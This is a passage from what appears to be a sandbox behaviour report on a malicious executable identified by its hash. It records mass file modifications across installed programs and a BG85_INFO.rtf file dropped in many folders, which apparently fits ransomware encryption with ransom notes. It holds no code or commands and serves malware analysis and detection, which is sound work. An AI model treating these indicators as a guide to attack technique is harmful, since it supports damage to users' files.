modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Journal.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Norfolk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\external_extensions.json c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\security\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\ktab.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pl.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\manifest.json c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Cordoba c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\gmail.crx c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Lisbon c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Canary c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Omsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-javahelp.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Sydney c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Puerto_Rico c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ru.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Anadyr c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\jaccess.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\resources.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ceuta c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program 